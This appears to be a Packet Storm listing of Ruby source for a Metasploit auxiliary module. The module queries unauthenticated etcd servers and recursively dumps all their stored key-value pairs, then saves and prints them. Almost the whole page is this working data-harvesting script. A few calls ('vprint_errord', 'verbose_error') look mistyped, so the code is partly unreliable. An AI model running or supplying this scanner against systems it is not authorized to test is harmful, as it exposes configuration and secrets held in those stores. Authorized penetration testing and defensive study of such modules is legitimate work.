

Etcd Keys API Information Gathering

This Metasploit module queries the etcd API to recursively retrieve all of the stored key value pairs. Etcd by default does not utilize authentication.

Packet Storm
### This module requires Metasploit: Current source: MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::Etcd  include Msf::Auxiliary::Scanner  def initialize    super(      'Name' => 'Etcd Keys API Information Gathering',      'Description' => %q(        This module queries the etcd API to recursively retrieve all of the stored        key value pairs.  Etcd by default does not utilize authentication.      ),      'References' => [        ['URL', '']      ],      'Author' => [        'Giovanni Collazo <[email protected]>', # discovery        'h00die' # msf module      ],      'License' => MSF_LICENSE,      'DisclosureDate' => "Mar 16 2018"    )  end  def run_host(_target_host)    path = normalize_uri(target_uri.to_s, 'v2/keys/?recursive=true')    banner = fingerprint_service(target_uri.to_s)    vprint_status("#{peer} - Collecting data through #{path}...")    res = send_request_raw(      'uri'    => path,      'method' => 'GET'    )    # parse the json if we got a good request back    if res && res.code == 200      begin        response = res.get_json_document        store_loot('', 'text/json', rhost, response, 'etcd.keys', 'etcd keys')      rescue JSON::ParserError => e        print_error("Failed to read JSON: #{e.class} - #{e.message}}")        return      end      print_good("#{peer}\nVersion: #{banner}\nData: #{JSON.pretty_generate(response)}")    elsif res      vprint_errord("Invalid response #{res.code} for etcd open keys response")      return    else      verbose_error("No response for etcd open keys probe")      return    end  endend

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